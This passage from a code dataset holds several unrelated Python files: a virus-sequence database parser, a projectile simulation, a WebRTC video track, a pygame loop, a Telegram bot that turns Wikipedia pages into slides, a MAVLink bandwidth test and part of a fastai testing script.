scrofa domesticus' in o:\n            h = 'swine'\n        else:\n            h = 'wild boar'\n    elif any(syn in o for syn in ['swine', 'pig', 'porcine', 'pork', 'sus scrofa domesticus', 'figatellu']):\n        h = 'swine'\n    elif any(syn in o for syn in ['rattus', 'rat']): # Rattus flavipectus?? 
=Rattus tanezumi\n        h = 'rat'\n    elif any(syn in o for syn in ['bandicota indica']): # greater bandicoot rat (Bandicota indica) is a species of rodent in the family Muridae found in Bangladesh, China,\n        h = 'Bandicota indica'\n    elif any(syn in o for syn in ['goat']): # goat, Capra aegagrus hircus\n        h = 'goat'\n    elif any(syn in o for syn in ['ferret', 'mustela putorius furo']):\n        h = 'ferret'\n    elif any(syn in o for syn in ['mustela putorius']):\n        h = 'polecat'\n    elif any(syn in o for syn in ['vulpes vulpes', 'fox']): # red fox (Vulpes vulpes), largest of the true foxes,\n        h = 'fox'\n    elif any(syn in o for syn in ['breadcrumb sponge', 'halichondria panicea']):\n        h = 'sponge'\n    elif any(syn in o for syn in ['treeshrew', 'tree shrew']):\n        h = 'treeshrew'\n    elif any(syn in o for syn in ['shrew', 'suncus murinus']): # Asian house shrew (Suncus murinus) grey musk shrew, Asian musk shrew, or money shrew is a widespread, adaptable species of shrew\n        h = 'shrew'\n    elif any(syn in o for syn in ['oryctolagus cuniculus', 'rabbit']):\n        h = 'rabbit'\n    elif any(syn in o for syn in ['chicken', 'hens']):\n        h = 'chicken'\n    elif any(syn in o for syn in ['gallus gallus']): # red junglefowl (Gallus gallus) is a tropical member of the family Phasianidae. It is the primary progenitor of the domestic chicken\n        h = 'Gallus gallus'\n    elif any(syn in o for syn in ['monkey', 'macaca mulatta']):\n        h = 'monkey'\n    elif any(syn in o for syn in ['cattle', 'cow']):\n        h = 'cattle'\n    elif any(syn in o for syn in ['tiger']):\n        h = 'tiger'\n    elif any(syn in o for syn in ['roe deer']): # deer; roe deer (Capreolus capreolus), also known as the western roe deer, chevreuil, or simply roe deer or roe\n        h = 'roe deer'\n    elif any(syn in o for syn in ['moose', 'alces alces']): # moose (North America) or elk (Eurasia), Alces alces, is the largest extant species in the deer family\n        h = 'moose'\n    elif any(syn in o for syn in ['red deer']): # deer; red deer (Cervus elaphus)\n        h = 'red deer'\n    elif any(syn in o for syn in ['deer']): # deer,\n        h = 'deer'\n    elif any(syn in o for syn in ['camelus']): # Bactrian camel\n        h = 'camel'\n    elif any(syn in o for syn in ['thrush']): # Turdidae, of passerine birds\n        h = 'thrush'\n    elif any(syn in o for syn in ['feral pigeon']): # pigeons; feral pigeons (Columba livia domestica), city doves, city pigeons, street pigeons, or flying rats\n        h = 'feral pigeon'\n    elif any(syn in o for syn in ['buzzard']): # buzzard is the common name of several species of bird of prey:\n        h = 'buzzard'\n    elif any(syn in o for syn in ['owl']): # Owls are birds from the order Strigiformes\n        h = 'owl'\n    elif any(syn in o for syn in ['sheep', 'ovine']): # sheep (Ovis aries)\n        h = 'sheep'\n    elif any(syn in o for syn in ['falco']): # common kestrel (Falco tinnunculus) is a bird of prey species belonging to the kestrel group of the falcon family Falconidae.\n        h = 'falcon'\n    elif any(syn in o for syn in ['mystacina tuberculata',\n                                  'vampyrodes caraccioli',\n                                  'rhinolophus ferrumequinum',\n                                  'myotis',\n                                  'eptesicus serotinus',\n                                  'hipposideros abae']): # serotine bat (Eptesicus serotinus), also known as the common serotine bat, big brown bat or silky bat -- lesser short-tailed bat (Mystacina tuberculata) – pekapeka-tou-poto in Māori – is the only living species of bat in the family Mystacinidae,[1] and is endemic to New Zealand.\n        h = 'bat'\n    elif any(syn in o for syn in ['arctocephalus australis']): # South American fur seal (Arctocephalus australis)\n        h = 'seal'\n    elif any(syn in o for syn in ['vulture']): # Himalayan vulture or Himalayan 
griffon vulture (Gyps himalayensis) is an Old World vulture in the family Accipitridae.\n        h = 'vulture'\n    elif any(syn in o for syn in ['dolphin']): #\n        h = 'dolphin'\n    elif any(syn in o for syn in ['bos grunniens']): #\n        h = 'yak'\n    elif any(syn in o for syn in ['mink', 'neovison vison']): #\n        h = 'mink'\n    elif any(syn in o for syn in ['egret']): # little egret (Egretta garzetta)\n        h = 'egret'\n    elif any(syn in o for syn in ['ruditapes philippinarum', 'scapharca subcrenata', 'anadara granosa']): #\n        h = 'clam'\n    elif any(syn in o for syn in ['mytilus galloprovincialis']): #\n        h = 'mussel'\n    elif any(syn in o for syn in ['oyster']): #\n        h = 'oyster'\n    elif any(syn in o for syn in ['felis catus']): #\n        h = 'cat'\n    elif any(syn in o for syn in ['trout']): # brook trout, cutthroat brook\n        h = 'trout'\n    elif any(syn in o for syn in ['herpestes javanicus', 'mongoose']): #\n        h = 'mongoose'\n    elif any(syn in o for syn in ['horse']): #\n        h = 'horse'\n    elif any(syn in o for syn in ['leopard']): #\n        h = 'leopard'\n    elif any(syn in o for syn in ['bear']): #\n        h = 'bear'\n    elif any(syn in o for syn in ['crowned crane']): #\n        h = 'crowned crane'\n    elif any(syn in o for syn in ['pheasant']): #\n        h = 'pheasant'\n\n\n\n\n    if not source: return h, None\n\n\n\n    if any(syn in source for syn in ['sera', 'serum']):\n        s = 'sera'\n    elif any(syn in source for syn in ['plasma']):\n        s = 'plasma'\n    elif any(syn in source for syn in ['liver', 'figatellu']):\n        s = 'liver'\n    elif any(syn in source for syn in ['feces',\n                                       'anal swab',\n                                       'manure',\n                                       'stool',\n                                       'fecal',\n                                       'intestinal content',\n                                       'caecal contents',\n                                       'fecces']):\n        s = 'feces'\n    elif any(syn in source for syn in ['bile', 'gall']):\n        s = 'bile'\n    elif any(syn in source for syn in ['milk']):\n        s = 'milk'\n    elif any(syn in source for syn in ['blood']):\n        s = 'blood'\n    elif any(syn in source for syn in ['brain']):\n        s = 'brain'\n    elif any(syn in source for syn in ['heart']):\n        s = 'heart'\n    elif any(syn in source for syn in ['kidney']):\n        s = 'kidney'\n    elif any(syn in source for syn in ['spleen']):\n        s = 'spleen'\n    elif any(syn in source for syn in ['urine']):\n        s = 'urine'\n    elif any(syn in source for syn in ['nares']):\n        s = 'nares'\n    elif any(syn in source for syn in ['colon']):\n        s = 'colon'\n    elif any(syn in source for syn in ['egg']):\n        s = 'egg'\n    elif any(syn in source for syn in ['sausage']):\n        s = 'sausage'\n    elif any(syn in source for syn in ['flesh', 'pork', 'sausage', 'muscle', 'meat']):\n        s = 'muscle'\n    elif any(syn in source for syn in ['cerebrospinal fluid', 'csf']):\n        s = 'CSF'\n    elif any(syn in source for syn in ['sewage', 'effluent', 'slurry']): # ????? 
feces ??\n        s = 'sewage'\n    elif any(syn in source for syn in ['river']): # ?????\n        s = 'river water'\n    elif any(syn in source for syn in ['culture supernatant', 'cell culture', 'hepatocytes']): # ?????\n        s = 'cell culture'\n    elif any(syn in source for syn in ['pool']): # ?????\n        s = 'pool'\n    elif any(syn in source for syn in ['soil']): # ?????\n        s = 'soil'\n    elif any(syn in source for syn in ['swab']): # ?????\n        s = 'swab'\n    elif any(syn in source for syn in ['wastewater', 'slaughterhouse']): # ?????\n        s = 'wastewater'\n    elif any(syn in source for syn in ['water']): # ?????\n        s = 'water'\n    elif any(syn in source for syn in ['strawberry']): # ?????\n        s = 'strawberry'\n\n    return h, s\n\n\ndef create_all( ):\n\n    newly = True # False\n    country = True # False\n\n    print('Creating db BioSQL...')\n\n#    dbBioSQL=createBioSQL(newly)\n\n\n\n    print('Creating db...')\n    sdb = create(newly)\n\n    if newly or country:\n        read_country_codes(sdb)\n\n    ref_name = \"M73218\"\n    if newly:\n        print('Parsing GB_flat_file...')\n        # parseGB(sdb, r'C:/Prog/HEV/data/temp/HEV-g3marked_all_2017-09-27. 577 seq.sequence.gb')\n        parseGB(sdb, r'../data/temp/HEV_all.sequence.gb')\n        print('Parsing the big alignment...')\n        ID_align, ref = parse_full_fasta_Align(sdb, ref_name,'../alignment/HEV.fas')\n        print(ref)\n    else:\n        print('Cleaning parsed Excel...')\n        clean_parsed_Excel(sdb)\n        ID_align=1 # ??\n\n        print('Calculate reference positions...')\n        ref = ref_pos(sdb, ID_align, ref_name) # , ref_name\n        print(ref)\n\n    print('Parse the Excel file table...')\n    parse_HEV_xlsm(sdb, '../data/temp/HEVsubtypingMEGAut - Kopie.xlsm')\n\n    print('Done !!!')\n    sdb.close()\n\n    # \"\"\"\n\n\nif __name__ == '__main__':\n    create_all( )\n\n# exit(0)\n# \"\"\"\n","repo_name":"qPCR4vir/HEV","sub_path":"python/seq_sql.py","file_name":"seq_sql.py","file_ext":"py","file_size_in_byte":65085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"8852448648","text":"import math\r\n\r\n# Input variables\r\nd = 6e-2 #meter\r\nm = 0.1 #kg\r\nv0 = 25 #m/s\r\nelv = 37 #degrees\r\ncd = 0.46\r\nrho = 1.2\r\ng = 9.8\r\nh = 0.05\r\nt = 0.0\r\ntmax = 2.85\r\nxFN = 0.0\r\nyFN = 0.0\r\n\r\n# Compute the drag constant and initial velocity components\r\nK = (cd*rho*math.pi*d**2)/(8*m)\r\nvFNx = v0*math.cos(math.radians(elv))\r\nvFNy = v0*math.sin(math.radians(elv))\r\n\r\n# Print column header\r\nprint('xFN','yFN')\r\n\r\n# Main loop\r\nwhile yFN>=0:\r\n    v = math.sqrt(vFNx**2 + vFNy**2)\r\n    aFNx = -K*v*vFNx\r\n    aFNy = -g-K*v*vFNy\r\n\r\n    # FN (half-step) method\r\n    xhalf = xFN + vFNx *h/2\r\n    yhalf = yFN + vFNy *h/2\r\n    vxhalf = vFNx + aFNx *h/2\r\n    vyhalf = vFNy + aFNy *h/2\r\n    vhalf = math.sqrt(vxhalf**2 + vyhalf**2)\r\n    axhalf = -K * vhalf * vxhalf\r\n    ayhalf = -g -K * vhalf * vyhalf\r\n    xFN += h*vxhalf\r\n    yFN += h* vyhalf\r\n    vFNx += h * axhalf\r\n    vFNy += h * ayhalf\r\n    t += h\r\n\r\n    # Print data\r\n    print(xFN,yFN)","repo_name":"Hrryisndr/Fisika-Komputasi","sub_path":"Perb_feyman&Euler.py","file_name":"Perb_feyman&Euler.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"28274356329","text":"import cv2\nfrom av import VideoFrame\nimport numpy as np\nimport json\n\nfrom aiortc import MediaStreamTrack, RTCPeerConnection, RTCSessionDescription\nfrom aiortc.contrib.media import MediaBlackhole, MediaPlayer, MediaRecorder\n\nimport multiprocessing as mp\nfrom multiprocessing import shared_memory as shm\n\nfrom . 
import (\n put_to_shm,\n get_from_shm,\n)\n\nimport logging\n# import auxiliary_module\n\n# create logger with 'spam_application'\nlogger = logging.getLogger('server')\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler('server.log')\nfh.setLevel(logging.DEBUG)\nlogger.addHandler(fh)\n\n\n\nclass VideoTransformTrack(MediaStreamTrack):\n \"\"\"\n A video stream track that transforms frames from an another track.\n \"\"\"\n\n kind = \"video\"\n p_in = None\n shm_size = 10\n shm_current_frame = shm.SharedMemory(create=True, size=1024 * 1024 * shm_size)\n shm_transformed_frame = shm.SharedMemory(create=True, size=1024 * 1024 * shm_size)\n\n def __init__(self, track, frame_lock, *, params):\n super().__init__() # don't forget this!\n self.workers = {}\n self.track = track\n self.transform = params['video_transform']\n self.count = 0\n self.transformer_pid = None\n self.frame_lock = frame_lock\n\n async def recv(self):\n frame = await self.track.recv()\n self.count += 1\n\n self.frame_lock.acquire()\n put_to_shm(frame, self.shm_current_frame.name)\n self.frame_lock.release()\n\n current_frame = frame.to_ndarray(format=\"bgr24\")\n # logger.info(f\"current_frame.shape: {current_frame.shape}\")\n\n if self.count % 10 == 0:\n self.p_in.send(\n {\n \"shape\": current_frame.shape,\n \"dtype\": current_frame.dtype,\n \"video_transform\": self.transform,\n }\n )\n\n self.frame_lock.acquire()\n transformed_image = get_from_shm(self.shm_transformed_frame.name, shape=current_frame.shape)\n self.frame_lock.release()\n\n new_frame = VideoFrame.from_ndarray(transformed_image, format=\"bgr24\")\n new_frame.pts = frame.pts\n new_frame.time_base = frame.time_base\n\n return new_frame\n\n\n\n","repo_name":"mf523/video-stream-bridge","sub_path":"src/backend/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70350206444","text":"from os import environ\n#Remove 'Hello from the pygame community. 
https://www.pygame.org/contribute.html' text from console\nenviron['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'\nimport pygame as pg\n\n#Logger\ndef Debug(Value):\n data = \"\"\n with open(\"logs/debug.txt\") as debugFile:\n data = debugFile.read()\n with open(\"logs/debug.txt\", 'w') as debugFile:\n debugFile.write(data + \"\\n\" + str(Value))\n\nif __name__ == \"__main__\":\n #Initialise game engine\n pg.init()\n\n #Window settings\n winX = 800\n winY = 800\n winSize = winX, winY\n #Position to middle\n environ['SDL_VIDEO_WINDOW_POS'] = '%i,%i' % (0,0)\n environ['SDL_VIDEO_CENTERED'] = '0'\n win = pg.display.set_mode(winSize, pg.NOFRAME)\n\n #Main loop active\n Run = True\n\n #Limit Frame per sec\n Clock = pg.time.Clock()\n\n def image(png):\n img = pg.image.load(\"assets/img/\" + png)\n return img\n\n #Loading assets\n def LoadAssets():\n Dictionary = {\n \"1\":image(\"background/01.png\"),\n \"exit0\":image(\"exit/exitX00.png\"),\n \"exit1\":image(\"exit/exitX01.png\"),\n \"player\":{\n \"headIdle\":{\n 0:image(\"player/headIdle00.png\"),\n 1:image(\"player/headIdle01.png\"),\n 2:image(\"player/headIdle02.png\"),\n 3:image(\"player/headIdle00.png\"),\n 4:image(\"player/headIdle00.png\"),\n },\n #\"\":image(\".png\"),\n #\"\":image(\".png\"),\n \"tail\":image(\"player/tail00.png\"),\n \"tailEnd\":image(\"player/tailEnd00.png\"),\n } \n }\n return Dictionary\n try:\n Asset = LoadAssets()\n except Exception as exp:\n Debug(\"Couldn't load assets. \" + str(exp))\n\n #user events\n usereventDic = {\"playerAnimation\":pg.USEREVENT # 24\n }\n eventTimerDic = {\"playerAnimation\": 200}\n for dic in usereventDic:\n pg.time.set_timer(usereventDic[dic], eventTimerDic[dic])\n\n #Hover\n exitHover = False\n\n #>| Background |<\n posX = 0\n posY = 0\n def backgroundCheck(var):\n if var == \"both\":\n if posX <= 32:\n posX += 1\n else: \n posX = 0\n if posY <= 32:\n posY += 1\n else: \n posY = 0\n elif var == \"y\":\n if posY <= 32:\n posY += 1\n else: \n posY = 0\n elif var == \"x\":\n if posX <= 32:\n posX += 1\n else: \n posX = 0\n else:\n if posX <= 32:\n pass\n else: \n posX = 0\n if posY <= 32:\n pass\n else: \n posY = 0\n\n #Drawing method\n def Draw():\n #Background\n for i in range(int(winX / 32 + 2)):\n for ii in range(int(winY / 32 + 2)):\n win.blit(Asset[\"1\"], ((-32 + posX + 32 * i),(-32 + posY + 32 * ii)))\n \n if exitHover == True:\n win.blit(Asset[\"exit1\"], (winX - 32 ,0))\n else:\n win.blit(Asset[\"exit0\"], (winX - 32 ,0))\n\n #Update display\n pg.display.update()\n \n #Main loop\n while Run:\n #Mouse position\n mousePos = pg.mouse.get_pos()\n #Mouse button\n mouseButton = pg.mouse.get_pressed()\n\n #Event handler\n for event in pg.event.get():\n if event.type == pg.QUIT: \n Run = False\n if mousePos[0] > winX - 30 and mousePos[0] < winX and mousePos[1] > 0 and mousePos[1] < 30:\n exitHover = True\n if mouseButton[0] != 0:\n Run = False\n else:\n exitHover = False\n \n \n Draw()\n Clock.tick(60)\n \n #Shutdown\n pg.quit()\n\nelse:\n Debug(\"!! -- !! 
-- !!\")","repo_name":"TheMikkoz/Underground","sub_path":"Underground.py","file_name":"Underground.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10678845844","text":"import requests\r\nimport telebot\r\nimport glob\r\nfrom PIL import Image, ImageSequence\r\nfrom bs4 import BeautifulSoup\r\nfrom pptx import Presentation\r\nfrom os import remove, path\r\nfrom time import sleep\r\n\r\n\r\ntoken = \"-\"\r\nparsed_text = [[]]\r\nparsed_titles = []\r\ntitle_black_list = [\"Классификация\", \"Аксессуары\", \"Примечания\", \"Литература\", \"Литература по теме\", \"Ссылки\",\r\n \"Галерея\", \"Специализирующиеся производители\", \"См. также\", \"Награды\", \"Города-побратимы\"]\r\nWIKI_URL = \"https://ru.wikipedia.org/wiki/\"\r\nmax_text_len = 1100\r\nmax_links = 600\r\nmp_error = False\r\nactual_content = {}\r\nnumber_of_slides = 0\r\n\r\n\r\ndef wiki_parser(url):\r\n global parsed_text, parsed_titles\r\n\r\n q = requests.get(url)\r\n result = q.content\r\n soup = BeautifulSoup(result, \"lxml\")\r\n\r\n all_info = soup.find(class_=\"mw-parser-output\")\r\n\r\n title_count = 0\r\n\r\n for child in all_info.children:\r\n if child.name == \"p\" and not isinstance(child, str):\r\n try:\r\n text = child.text\r\n if text == \"#invoke:Navbox\\n\" or \"См. также:\" in text:\r\n continue\r\n for i in range(1, max_links):\r\n text = text.replace(f\"[{i}]\", \"\").replace(f\"[комм. {i}]\", \"\")\r\n if text[-1] == \":\":\r\n text = text[:-1] + \".\"\r\n parsed_text[title_count].append(text)\r\n except:\r\n continue\r\n elif child.name == \"h2\" and not isinstance(child, str):\r\n text = child.text.replace(\"[править | править код]\", \"\").replace(\"[значимость факта?]\", \"\")\r\n parsed_titles.append(text)\r\n title_count += 1\r\n parsed_text.append([])\r\n elif child.name == \"div\" or child.name == \"table\":\r\n try:\r\n content_class = child.get(\"class\")\r\n if title_count:\r\n actual_title = parsed_titles[-1]\r\n if actual_title not in actual_content and \"thumb\" in content_class or \"infobox\" in content_class:\r\n content_href = \"https:\"+child.find(\"img\").get(\"src\")\r\n content_type = content_href[-3:]\r\n r = requests.get(content_href)\r\n content_name = f\"{actual_title}.{content_type}\"\r\n with open(f\"data/{content_name}\", \"bw\") as f:\r\n f.write(r.content)\r\n actual_content[actual_title] = content_name\r\n else:\r\n actual_title = 0\r\n if actual_title not in actual_content and \"thumb\" in content_class or \"infobox\" in content_class:\r\n content_href = \"https:\"+child.find(\"img\").get(\"src\")\r\n content_type = content_href[-3:]\r\n r = requests.get(content_href)\r\n content_name = f\"{actual_title}.{content_type}\"\r\n with open(f\"data/{content_name}\", \"bw\") as f:\r\n f.write(r.content)\r\n actual_content[actual_title] = content_name\r\n except:\r\n continue\r\n\r\n for text in parsed_text:\r\n for p in text:\r\n if p != \"\\n\":\r\n break\r\n else:\r\n local_ind = parsed_text.index(text)\r\n if local_ind != 0:\r\n del parsed_text[local_ind]\r\n del parsed_titles[local_ind-1]\r\n while True:\r\n if [] in parsed_text:\r\n ind = parsed_text.index([])\r\n del parsed_text[ind]\r\n del parsed_titles[ind-1]\r\n else:\r\n break\r\n\r\n\r\ndef clean_trash():\r\n for title in parsed_titles:\r\n ind = parsed_titles.index(title)+1\r\n if \"Известные\" in title:\r\n del parsed_text[ind]\r\n del parsed_titles[ind-1]\r\n if title in title_black_list:\r\n all_text = \"\"\r\n 
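# sum up this section's paragraphs to check whether it is effectively empty\r\n            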
for text in parsed_text[ind]:\r\n                all_text += text\r\n            if len(all_text) < 50:\r\n                del parsed_text[ind]\r\n                del parsed_titles[ind-1]\r\n\r\n\r\ndef thumbnails(frames, size):\r\n    # size: (width, height) bound applied to each animation frame\r\n    for frame in frames:\r\n        thumbnail = frame.copy()\r\n        thumbnail.thumbnail(size, Image.ANTIALIAS)\r\n        yield thumbnail\r\n\r\n\r\ndef content_resize():\r\n    for key in actual_content.keys():\r\n        try:\r\n            correct_dir = f\"data/{actual_content[key]}\"\r\n            content = Image.open(correct_dir)\r\n            x, y = content.size\r\n\r\n            if y / x != 10 / 6.7:\r\n                if x > y:\r\n                    new_x = x\r\n                    new_y = int(x * 1.49)\r\n\r\n                elif x < y or x == y:\r\n                    new_x = int(y / 1.49)\r\n                    new_y = y\r\n\r\n                if actual_content[key][-3:] == \"gif\":\r\n                    frames = ImageSequence.Iterator(content)\r\n                    frames = thumbnails(frames, (new_x, new_y))\r\n                    gif_content = next(frames)\r\n                    gif_content.info = content.info\r\n                    gif_content.save(correct_dir, save_all=True, append_images=list(frames))\r\n\r\n                else:\r\n                    result = content.crop((0, 0, x, y)).resize((new_x, new_y))\r\n                    result.save(correct_dir)\r\n\r\n        except:\r\n            continue\r\n\r\n\r\n\r\ndef delete_slide(index):\r\n    global prs\r\n    xml_slides = prs.slides._sldIdLst # pylint: disable=W0212\r\n    slides = list(xml_slides)\r\n    xml_slides.remove(slides[index])\r\n\r\n\r\ndef presentation_maker():\r\n    global actual_content, prs, number_of_slides\r\n\r\n    clean_trash()\r\n    content_resize()\r\n\r\n    try:\r\n        prs = Presentation(\"sample.pptx\")\r\n    except:\r\n        prs = Presentation()\r\n\r\n    first_slide_layout = prs.slide_layouts[0]\r\n    first_slide = prs.slides.add_slide(first_slide_layout)\r\n    first_count = 0\r\n    slides_with_error = []\r\n\r\n    for shape in first_slide.shapes:\r\n        if not shape.has_text_frame:\r\n            continue\r\n        if not first_count:\r\n            shape.text = theme\r\n            first_count += 1\r\n        else:\r\n            shape.text = f\"Подготовил {name}\"\r\n\r\n    second_slide_layout = prs.slide_layouts[1] if 0 not in actual_content else prs.slide_layouts[8]\r\n    second_slide = prs.slides.add_slide(second_slide_layout)\r\n    if second_slide_layout == prs.slide_layouts[8]:\r\n        try:\r\n            placeholder = second_slide.placeholders[1]\r\n            placeholder.insert_picture(f\"data/{actual_content[0]}\")\r\n        except:\r\n            slides_with_error.append(1)\r\n            second_slide_layout = prs.slide_layouts[1]\r\n            second_slide = prs.slides.add_slide(second_slide_layout)\r\n\r\n    second_count = 0\r\n    for shape in second_slide.shapes:\r\n        if not shape.has_text_frame:\r\n            continue\r\n        elif not second_count:\r\n            shape.text = theme\r\n            second_count += 1\r\n        else:\r\n            text = \"\\n\".join(parsed_text[0])\r\n            if len(text) > max_text_len:\r\n                symbol_counter = -1\r\n                for symbol in text:\r\n                    symbol_counter += 1\r\n                    if symbol == \".\":\r\n                        dot_ind = symbol_counter\r\n                    if symbol_counter > max_text_len:\r\n                        break\r\n                text = text[:dot_ind+1]\r\n            shape.text = text\r\n\r\n    for title in parsed_titles:\r\n        slide_layout = prs.slide_layouts[1] if title not in actual_content else prs.slide_layouts[8]\r\n        title_ind = parsed_titles.index(title)\r\n        slide = prs.slides.add_slide(slide_layout)\r\n        if slide_layout == prs.slide_layouts[8]:\r\n            try:\r\n                placeholder = slide.placeholders[1]\r\n                placeholder.insert_picture(f\"data/{actual_content[title]}\")\r\n            except:\r\n                slides_with_error.append(title_ind+2)\r\n                slide_layout = prs.slide_layouts[1]\r\n                slide = prs.slides.add_slide(slide_layout)\r\n\r\n        local_count = 0\r\n        for shape in slide.shapes:\r\n            if not shape.has_text_frame:\r\n                continue\r\n            elif not local_count:\r\n                shape.text = title\r\n                local_count += 1\r\n            else:\r\n                text = \"\\n\".join(parsed_text[title_ind+1])\r\n                if len(text) > 
max_text_len:\r\n symbol_counter = -1\r\n for symbol in text:\r\n symbol_counter += 1\r\n if symbol == \".\":\r\n dot_ind = symbol_counter\r\n if symbol_counter > max_text_len:\r\n break\r\n text = text[:dot_ind+1]\r\n shape.text = text\r\n local_count = 0\r\n\r\n for slide_with_error_ind in slides_with_error:\r\n delete_slide(slide_with_error_ind)\r\n\r\n prs.save(f'{theme}.pptx')\r\n number_of_slides = len(prs.slides)\r\n print(\"Количество слайдов:\", number_of_slides)\r\n\r\n\r\n\r\ndef make_presentation():\r\n global mp_error, actual_content\r\n\r\n try:\r\n #Забираю данные с Википедии\r\n wiki_parser(WIKI_URL+theme.replace(\" \", \"_\"))\r\n print(\"Парсинг завершён\")\r\n\r\n #Создаю презентацию\r\n presentation_maker()\r\n except:\r\n mp_error = True\r\n\r\n actual_content = {}\r\n files = glob.glob(\"data/*\")\r\n for file in files:\r\n remove(file)\r\n\r\n\r\ndef telegram_bot(token):\r\n global bot\r\n print(\"Бот запущен\")\r\n bot = telebot.TeleBot(token, threaded=False)\r\n\r\n @bot.message_handler(commands=[\"start\"])\r\n def start_message(message):\r\n try:\r\n bot.send_message(message.chat.id, \"Укажите в первой строчке тему, а во второй имя автора\")\r\n except:\r\n print(\"Ошибка отправки(Стартовое сообщение)\")\r\n\r\n @bot.message_handler(content_types=[\"text\"])\r\n def send_text(message):\r\n global theme, name, parsed_text, parsed_titles, mp_error\r\n\r\n if message.text.count(\"\\n\") == 1:\r\n theme, name = message.text.split(\"\\n\")\r\n print(f\"\\n{theme} ////// {name}\")\r\n make_presentation()\r\n if mp_error:\r\n try:\r\n bot.send_message(message.chat.id, \"Извините, у нас технические шоколадки. Пожалуйста, попробуйте позже\")\r\n except:\r\n print(\"Ошибка отправки(Оповещение о несозданной презентации)\")\r\n print(\"Ошибка создания презентации\")\r\n mp_error = False\r\n else:\r\n file = open(f\"{theme}.pptx\", \"rb\")\r\n try:\r\n bot.send_document(message.chat.id, file)\r\n bot.send_message(message.chat.id, f\"Количество слайдов: {number_of_slides}\")\r\n print(\"Успешно\")\r\n except:\r\n print(\"Ошибка отправки(Презентация)\")\r\n file.close()\r\n remove(f\"{theme}.pptx\")\r\n parsed_text, parsed_titles = [[]], []\r\n else:\r\n try:\r\n bot.send_message(message.chat.id, \"Кажется, что-то пошло не так. 
Пожалуйста, проверьте форму указанных данных\")\r\n except:\r\n print(\"Ошибка отправки(Оповещение о неправильной форме указанных данных)\")\r\n\r\n bot.polling()\r\n\r\nif __name__ == \"__main__\":\r\n telegram_bot(token)\r\n","repo_name":"Jative/Auto-pptx-telegram-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74453615082","text":"#!/usr/bin/env python\n\n'''\ncheck bandwidth of link\n'''\nfrom __future__ import print_function\nimport time\n\nfrom pymavlink import mavutil\n\n#using argparse to receive options from the command line\nfrom argparse import ArgumentParser\nparser = ArgumentParser(description=__doc__)\n\nparser.add_argument(\"--baudrate\", type=int,\n help=\"master port baud rate\", default=115200)\nparser.add_argument(\"--device\", required=True, help=\"serial device\")\nargs = parser.parse_args()\n\n### MAV related code starts here ###\n\n# create a mavlink serial instance\nmaster = mavutil.mavlink_connection(args.device, baud=args.baudrate)\n\nt1 = time.time()\n\ncounts = {}\n\nbytes_sent = 0\nbytes_recv = 0\n\nwhile True:\n #send some messages to the target system with dummy data\n master.mav.heartbeat_send(1, 1)\n master.mav.sys_status_send(1, 2, 3, 4, 5, 6, 7)\n master.mav.gps_raw_send(1, 2, 3, 4, 5, 6, 7, 8, 9)\n master.mav.attitude_send(1, 2, 3, 4, 5, 6, 7)\n master.mav.vfr_hud_send(1, 2, 3, 4, 5, 6)\n\n #Check for incoming data on the serial port and count\n #how many messages of each type have been received\n while master.port.inWaiting() > 0:\n #recv_msg will try parsing the serial port buffer\n #and return a new message if available\n m = master.recv_msg()\n\n if m is None: break #No new message\n \n if m.get_type() not in counts:\n #if no messages of this type received, add this type to the counts dict\n counts[m.get_type()] = 0\n\n counts[m.get_type()] += 1\n\n #Print statistics every second\n t2 = time.time()\n if t2 - t1 > 1.0:\n print(\"%u sent, %u received, %u errors bwin=%.1f kB/s bwout=%.1f kB/s\" % (\n master.mav.total_packets_sent,\n master.mav.total_packets_received,\n master.mav.total_receive_errors,\n 0.001*(master.mav.total_bytes_received-bytes_recv)/(t2-t1),\n 0.001*(master.mav.total_bytes_sent-bytes_sent)/(t2-t1)))\n bytes_sent = master.mav.total_bytes_sent\n bytes_recv = master.mav.total_bytes_received\n t1 = t2\n","repo_name":"ArduPilot/pymavlink","sub_path":"examples/bwtest.py","file_name":"bwtest.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":392,"dataset":"github-code","pt":"19"} +{"seq_id":"42424627976","text":"\"\"\"Main testing script for the composite outcome experiment. 
Purpose is to determine whether using composite outcomes improves DL performance for prognosis\r\n\r\nUsage:\r\n run_model.py [--checkFiles] [--modelarch=MODELARCH] [--type=TYPE] [--dataframe=DF] [--target=TARGET] [--split=SPLIT] [--size=SIZE] [--saliency=SAL_DIR]\r\n run_model.py (-h | --help)\r\nExamples:\r\n run_model.py /path/to/images /path/to/model /path/to/write/output.csv\r\nOptions:\r\n -h --help Show this screen.\r\n --modelarch=MODELARCH CNN model architecture to train [default: Resnet34]\r\n --type=TYPE Type of output [default: Discrete]\r\n --dataframe=DF Optional data frame to select which images are of interest [default: None]\r\n --target=TARGET If optional df is specified, then need to include the target variable [default: None]\r\n --split=SPLIT If split, then split on the Dataset column keeping only the Te values [default: False]\r\n --checkFiles Should we check whether df files actually exist?\r\n --size=SIZE Resize to this size [Default:224]\r\n --saliency=SAL_DIR Directory to write saliency maps to [Default:None]\r\n\"\"\"\r\n\r\nimport os\r\nfrom docopt import docopt\r\nimport pandas as pd\r\nimport fastai\r\nfrom fastai.vision import *\r\nimport pretrainedmodels\r\nfrom sklearn.metrics import *\r\nfrom fastai.callbacks import *\r\nimport math\r\nimport time\r\nimport SimpleArchs\r\nimport GradCAMUtils\r\nfrom PIL import Image\r\nfrom torchvision import transforms\r\n\r\n\r\n###TODO Add optional checkpointing (optional result file to append to, skipping loop iteration if model exists)\r\ntfms_test = get_transforms(do_flip = False,max_warp = None)\r\n\r\n\r\n\r\n \r\ndef _tta_only(learn:Learner, ds_type:DatasetType=DatasetType.Valid, activ:nn.Module=None, scale:float=1.35) -> Iterator[List[Tensor]]:\r\n \"Computes the 